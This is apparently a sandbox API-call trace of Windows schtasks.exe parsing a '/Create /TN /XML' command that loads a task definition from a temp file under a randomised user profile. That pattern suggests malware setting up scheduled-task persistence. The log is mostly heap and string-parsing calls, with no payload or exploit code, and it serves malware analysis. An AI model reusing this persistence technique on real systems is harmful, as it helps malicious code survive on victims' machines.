[0184.373] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.373] lstrlenW (lpString="XML") returned 3
[0184.373] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.373] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0xa, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|showsid|") returned 9
[0184.374] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|XML|") returned 5
[0184.374] lstrlenW (lpString="|showsid|") returned 9
[0184.374] lstrlenW (lpString="|XML|") returned 5
[0184.374] StrStrIW (lpFirst="|showsid|", lpSrch="|XML|") returned 0x0
[0184.374] RtlRestoreLastWin32Error () returned 0x490
[0184.374] RtlRestoreLastWin32Error () returned 0x490
[0184.374] RtlRestoreLastWin32Error () returned 0x0
[0184.374] lstrlenW (lpString="/XML") returned 4
[0184.374] StrChrIW (lpStart="/XML", wMatch=0x3a) returned 0x0
[0184.374] RtlRestoreLastWin32Error () returned 0x490
[0184.374] RtlRestoreLastWin32Error () returned 0x0
[0184.374] lstrlenW (lpString="/XML") returned 4
[0184.374] GetProcessHeap () returned 0x4920000
[0184.374] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0xa) returned 0x4927458
[0184.374] GetProcessHeap () returned 0x4920000
[0184.374] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x4929438
[0184.374] RtlRestoreLastWin32Error () returned 0x0
[0184.374] RtlRestoreLastWin32Error () returned 0x0
[0184.374] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpDA5D.tmp") returned 52
[0184.374] lstrlenW (lpString="-/") returned 2
[0184.374] StrChrIW (lpStart="-/", wMatch=0x280043) returned 0x0
[0184.374] RtlRestoreLastWin32Error () returned 0x490
[0184.374] RtlRestoreLastWin32Error () returned 0x490
[0184.374] RtlRestoreLastWin32Error () returned 0x0
[0184.374] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpDA5D.tmp") returned 52
[0184.374] StrChrIW (lpStart="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpDA5D.tmp", wMatch=0x3a) returned=":\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpDA5D.tmp"
[0184.374] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpDA5D.tmp") returned 52
[0184.374] GetProcessHeap () returned 0x4920000
[0184.374] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x10) returned 0x4927440
[0184.374] _memicmp (_Buf1=0x4927440, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.374] GetProcessHeap () returned 0x4920000
[0184.374] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0xc) returned 0x4927380
[0184.375] GetProcessHeap () returned 0x4920000
[0184.375] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x10) returned 0x492aa08
[0184.375] _memicmp (_Buf1=0x492aa08, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.375] GetProcessHeap () returned 0x4920000
[0184.375] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x6e) returned 0x49269d0
[0184.375] RtlRestoreLastWin32Error () returned 0x7a
[0184.375] RtlRestoreLastWin32Error () returned 0x0
[0184.375] RtlRestoreLastWin32Error () returned 0x0
[0184.375] lstrlenW (lpString="C") returned 1
[0184.375] RtlRestoreLastWin32Error () returned 0x490
[0184.375] RtlRestoreLastWin32Error () returned 0x0
[0184.375] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpDA5D.tmp") returned 52
[0184.375] GetProcessHeap () returned 0x4920000
[0184.375] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x6a) returned 0x4926a48
[0184.375] GetProcessHeap () returned 0x4920000
[0184.375] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x49296d8
[0184.375] RtlRestoreLastWin32Error () returned 0x0
[0184.375] GetProcessHeap () returned 0x4920000
[0184.375] GetProcessHeap () returned 0x4920000
[0184.375] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4926c60) returned 1
[0184.375] GetProcessHeap () returned 0x4920000
[0184.375] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4926c60) returned 0x8
[0184.375] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4926c60) returned 1
[0184.375] GetProcessHeap () returned 0x4920000
[0184.375] GetProcessHeap () returned 0x4920000
[0184.375] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x49295d8) returned 1
[0184.375] GetProcessHeap () returned 0x4920000
[0184.375] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x49295d8) returned 0x14
[0184.375] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x49295d8) returned 1
[0184.375] GetProcessHeap () returned 0x4920000
[0184.375] GetProcessHeap () returned 0x4920000
[0184.375] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4928f88) returned 1
[0184.376] GetProcessHeap () returned 0x4920000
[0184.376] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4928f88) returned 0x22
[0184.376] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4928f88) returned 1
[0184.376] GetProcessHeap () returned 0x4920000
[0184.376] GetProcessHeap () returned 0x4920000
[0184.376] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x49295f8) returned 1
[0184.376] GetProcessHeap () returned 0x4920000
[0184.376] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x49295f8) returned 0x14
[0184.376] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x49295f8) returned 1
[0184.376] GetProcessHeap () returned 0x4920000
[0184.376] GetProcessHeap () returned 0x4920000
[0184.376] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4927458) returned 1
[0184.376] GetProcessHeap () returned 0x4920000
[0184.376] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4927458) returned 0xa
[0184.377] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4927458) returned 1
[0184.377] GetProcessHeap () returned 0x4920000
[0184.377] GetProcessHeap () returned 0x4920000
[0184.377] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4929438) returned 1
[0184.377] GetProcessHeap () returned 0x4920000
[0184.377] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4929438) returned 0x14
[0184.377] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4929438) returned 1
[0184.377] GetProcessHeap () returned 0x4920000
[0184.377] GetProcessHeap () returned 0x4920000
[0184.377] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4926a48) returned 1
[0184.377] GetProcessHeap () returned 0x4920000
[0184.377] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4926a48) returned 0x6a
[0184.377] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4926a48) returned 1
[0184.377] GetProcessHeap () returned 0x4920000
[0184.377] GetProcessHeap () returned 0x4920000
[0184.377] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x49296d8) returned 1
[0184.377] GetProcessHeap () returned 0x4920000
[0184.377] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x49296d8) returned 0x14
[0184.378] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x49296d8) returned 1
[0184.378] GetProcessHeap () returned 0x4920000
[0184.378] GetProcessHeap () returned 0x4920000
[0184.378] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4927320) returned 1
[0184.378] GetProcessHeap () returned 0x4920000
[0184.378] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4927320) returned 0x10
[0184.378] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4927320) returned 1
[0184.378] RtlRestoreLastWin32Error () returned 0x0
[0184.378] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0184.378] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0184.378] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b
[0184.378] RtlVerifyVersionInfo (VersionInfo=0xdce60, TypeMask=0x3, ConditionMask=0x1801b) returned 0x0
[0184.378] RtlRestoreLastWin32Error () returned 0x0
[0184.378] lstrlenW (lpString="create") returned 6
[0184.379] StrChrIW (lpStart="create", wMatch=0x7c) returned 0x0
[0184.379] RtlRestoreLastWin32Error () returned 0x490
[0184.379] RtlRestoreLastWin32Error () returned 0x0
[0184.379] lstrlenW (lpString="create") returned 6
[0184.379] GetProcessHeap () returned 0x4920000
[0184.379] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x4929598
[0184.379] GetProcessHeap () returned 0x4920000
[0184.379] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x10) returned 0x492abb8
[0184.379] _memicmp (_Buf1=0x492abb8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.379] GetProcessHeap () returned 0x4920000
[0184.379] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x16) returned 0x4929478
[0184.379] RtlRestoreLastWin32Error () returned 0x0
[0184.379] _memicmp (_Buf1=0x4927398, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.379] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4928cd0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20
[0184.379] GetFileVersionInfoSizeExW (in: dwFlags=0x1, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0xdcf6c | out: lpdwHandle=0xdcf6c) returned 0x76c
[0184.379] GetProcessHeap () returned 0x4920000
[0184.379] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x776) returned 0x4929da8
[0184.379] GetFileVersionInfoExW (in: dwFlags=0x3, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x776, lpData=0x4929da8 | out: lpData=0x4929da8) returned 1
[0184.380] VerQueryValueW (in: pBlock=0x4929da8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdcf74, puLen=0xdcf78 | out: lplpBuffer=0xdcf74*=0x492a158, puLen=0xdcf78) returned 1
[0184.380] _memicmp (_Buf1=0x4927398, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.380] _vsnwprintf (in: _Buffer=0x4928cd0, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xdcf58 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0184.380] VerQueryValueW (in: pBlock=0x4929da8, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xdcf84, puLen=0xdcf80 | out: lplpBuffer=0xdcf84*=0x4929f88, puLen=0xdcf80) returned 1
[0184.380] lstrlenW (lpString="schtasks.exe") returned 12
[0184.380] lstrlenW (lpString="schtasks.exe") returned 12
[0184.380] lstrlenW (lpString=".EXE") returned 4
[0184.380] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe"
[0184.380] lstrlenW (lpString="schtasks.exe") returned 12
[0184.380] lstrlenW (lpString=".EXE") returned 4
[0184.380] lstrlenW (lpString="schtasks") returned 8
[0184.380] lstrlenW (lpString="/create") returned 7
[0184.380] _memicmp (_Buf1=0x4927398, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.380] _vsnwprintf (in: _Buffer=0x4928cd0, _BufferCount=0x19, _Format="%s %s", _ArgList=0xdcf58 | out: _Buffer="schtasks /create") returned 16
[0184.380] _memicmp (_Buf1=0x49273f8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.380] GetProcessHeap () returned 0x4920000
[0184.380] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x49296d8
[0184.380] _memicmp (_Buf1=0x4927368, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.380] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x492a788, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0184.380] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0184.380] GetProcessHeap () returned 0x4920000
[0184.380] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x30) returned 0x4928f88
[0184.380] _vsnwprintf (in: _Buffer=0x4928ee0, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xdcf5c | out: _Buffer="Type \"SCHTASKS /CREATE /?\" for usage.") returned 37
[0184.380] GetProcessHeap () returned 0x4920000
[0184.380] GetProcessHeap () returned 0x4920000
[0184.381] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4929da8) returned 1
[0184.381] GetProcessHeap () returned 0x4920000
[0184.381] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4929da8) returned 0x776
[0184.381] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4929da8) returned 1
[0184.381] RtlRestoreLastWin32Error () returned 0x0
[0184.381] GetThreadLocale () returned 0x409
[0184.381] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.381] lstrlenW (lpString="create") returned 6
[0184.381] GetThreadLocale () returned 0x409
[0184.381] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.381] lstrlenW (lpString="?") returned 1
[0184.381] GetThreadLocale () returned 0x409
[0184.381] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.381] lstrlenW (lpString="s") returned 1
[0184.381] GetThreadLocale () returned 0x409
[0184.381] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.382] lstrlenW (lpString="u") returned 1
[0184.382] GetThreadLocale () returned 0x409
[0184.382] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.382] lstrlenW (lpString="p") returned 1
[0184.382] GetThreadLocale () returned 0x409
[0184.382] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.382] lstrlenW (lpString="ru") returned 2
[0184.382] GetThreadLocale () returned 0x409
[0184.382] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.382] lstrlenW (lpString="rp") returned 2
[0184.382] GetThreadLocale () returned 0x409
[0184.382] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.382] lstrlenW (lpString="sc") returned 2
[0184.382] GetThreadLocale () returned 0x409
[0184.382] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.382] lstrlenW (lpString="mo") returned 2
[0184.382] GetThreadLocale () returned 0x409
[0184.382] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.382] lstrlenW (lpString="d") returned 1
[0184.382] GetThreadLocale () returned 0x409
[0184.382] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.382] lstrlenW (lpString="m") returned 1
[0184.382] GetThreadLocale () returned 0x409
[0184.382] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.382] lstrlenW (lpString="i") returned 1
[0184.382] GetThreadLocale () returned 0x409
[0184.382] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.382] lstrlenW (lpString="tn") returned 2
[0184.382] GetThreadLocale () returned 0x409
[0184.382] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.382] lstrlenW (lpString="tr") returned 2
[0184.382] GetThreadLocale () returned 0x409
[0184.382] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.383] lstrlenW (lpString="st") returned 2
[0184.383] GetThreadLocale () returned 0x409
[0184.383] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.383] lstrlenW (lpString="sd") returned 2
[0184.383] GetThreadLocale () returned 0x409
[0184.383] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.383] lstrlenW (lpString="ed") returned 2
[0184.383] GetThreadLocale () returned 0x409
[0184.383] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.383] lstrlenW (lpString="it") returned 2
[0184.383] GetThreadLocale () returned 0x409
[0184.383] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.383] lstrlenW (lpString="et") returned 2
[0184.383] GetThreadLocale () returned 0x409
[0184.383] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.383] lstrlenW (lpString="k") returned 1
[0184.383] GetThreadLocale () returned 0x409
[0184.383] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.383] lstrlenW (lpString="du") returned 2
[0184.383] GetThreadLocale () returned 0x409
[0184.383] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.383] lstrlenW (lpString="ri") returned 2
[0184.383] GetThreadLocale () returned 0x409
[0184.383] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.383] lstrlenW (lpString="z") returned 1
[0184.383] GetThreadLocale () returned 0x409
[0184.383] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.383] lstrlenW (lpString="f") returned 1
[0184.383] GetThreadLocale () returned 0x409
[0184.383] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.383] lstrlenW (lpString="v1") returned 2
[0184.383] GetThreadLocale () returned 0x409
[0184.383] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.384] lstrlenW (lpString="xml") returned 3
[0184.384] GetThreadLocale () returned 0x409
[0184.384] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.384] lstrlenW (lpString="ec") returned 2
[0184.384] GetThreadLocale () returned 0x409
[0184.384] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.384] lstrlenW (lpString="rl") returned 2
[0184.384] GetThreadLocale () returned 0x409
[0184.384] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.384] lstrlenW (lpString="delay") returned 5
[0184.384] GetThreadLocale () returned 0x409
[0184.384] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.384] lstrlenW (lpString="np") returned 2
[0184.384] GetThreadLocale () returned 0x409
[0184.384] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.384] lstrlenW (lpString="hresult") returned 7
[0184.384] RtlRestoreLastWin32Error () returned 0x0
[0184.384] RtlRestoreLastWin32Error () returned 0x0
[0184.384] lstrlenW (lpString="/Create") returned 7
[0184.384] lstrlenW (lpString="-/") returned 2
[0184.384] StrChrIW (lpStart="-/", wMatch=0x28002f) returned="/"
[0184.384] lstrlenW (lpString="create") returned 6
[0184.384] lstrlenW (lpString="create") returned 6
[0184.384] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.384] lstrlenW (lpString="Create") returned 6
[0184.384] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.384] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8
[0184.384] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|Create|") returned 8
[0184.384] lstrlenW (lpString="|create|") returned 8
[0184.384] lstrlenW (lpString="|Create|") returned 8
[0184.385] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|"
[0184.385] RtlRestoreLastWin32Error () returned 0x0
[0184.385] RtlRestoreLastWin32Error () returned 0x0
[0184.385] RtlRestoreLastWin32Error () returned 0x0
[0184.385] lstrlenW (lpString="/TN") returned 3
[0184.385] lstrlenW (lpString="-/") returned 2
[0184.385] StrChrIW (lpStart="-/", wMatch=0x28002f) returned="/"
[0184.385] lstrlenW (lpString="create") returned 6
[0184.385] lstrlenW (lpString="create") returned 6
[0184.385] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.385] lstrlenW (lpString="TN") returned 2
[0184.385] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.385] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8
[0184.385] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0184.385] lstrlenW (lpString="|create|") returned 8
[0184.385] lstrlenW (lpString="|TN|") returned 4
[0184.385] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0
[0184.385] RtlRestoreLastWin32Error () returned 0x490
[0184.385] lstrlenW (lpString="?") returned 1
[0184.385] lstrlenW (lpString="?") returned 1
[0184.385] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.385] lstrlenW (lpString="TN") returned 2
[0184.385] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.385] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|?|") returned 3
[0184.385] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0184.385] lstrlenW (lpString="|?|") returned 3
[0184.385] lstrlenW (lpString="|TN|") returned 4
[0184.385] RtlRestoreLastWin32Error () returned 0x490
[0184.385] lstrlenW (lpString="s") returned 1
[0184.386] lstrlenW (lpString="s") returned 1
[0184.386] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.386] lstrlenW (lpString="TN") returned 2
[0184.386] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.386] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|s|") returned 3
[0184.386] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0184.386] lstrlenW (lpString="|s|") returned 3
[0184.386] lstrlenW (lpString="|TN|") returned 4
[0184.386] RtlRestoreLastWin32Error () returned 0x490
[0184.386] lstrlenW (lpString="u") returned 1
[0184.386] lstrlenW (lpString="u") returned 1
[0184.386] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.386] lstrlenW (lpString="TN") returned 2
[0184.387] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.387] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|u|") returned 3
[0184.387] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0184.387] lstrlenW (lpString="|u|") returned 3
[0184.387] lstrlenW (lpString="|TN|") returned 4
[0184.387] RtlRestoreLastWin32Error () returned 0x490
[0184.387] lstrlenW (lpString="p") returned 1
[0184.387] lstrlenW (lpString="p") returned 1
[0184.387] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.387] lstrlenW (lpString="TN") returned 2
[0184.387] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.387] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|p|") returned 3
[0184.387] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0184.387] lstrlenW (lpString="|p|") returned 3
[0184.387] lstrlenW (lpString="|TN|") returned 4
[0184.387] RtlRestoreLastWin32Error () returned 0x490
[0184.387] lstrlenW (lpString="ru") returned 2
[0184.387] lstrlenW (lpString="ru") returned 2
[0184.387] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.387] lstrlenW (lpString="TN") returned 2
[0184.387] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.387] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ru|") returned 4
[0184.387] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0184.387] lstrlenW (lpString="|ru|") returned 4
[0184.387] lstrlenW (lpString="|TN|") returned 4
[0184.387] StrStrIW (lpFirst="|ru|", lpSrch="|TN|") returned 0x0
[0184.387] RtlRestoreLastWin32Error () returned 0x490
[0184.388] lstrlenW (lpString="rp") returned 2
[0184.388] lstrlenW (lpString="rp") returned 2
[0184.388] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.388] lstrlenW (lpString="TN") returned 2
[0184.388] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.388] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rp|") returned 4
[0184.388] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0184.388] lstrlenW (lpString="|rp|") returned 4
[0184.388] lstrlenW (lpString="|TN|") returned 4
[0184.388] StrStrIW (lpFirst="|rp|", lpSrch="|TN|") returned 0x0
[0184.388] RtlRestoreLastWin32Error () returned 0x490
[0184.388] lstrlenW (lpString="sc") returned 2
[0184.388] lstrlenW (lpString="sc") returned 2
[0184.388] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.388] lstrlenW (lpString="TN") returned 2
[0184.388] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
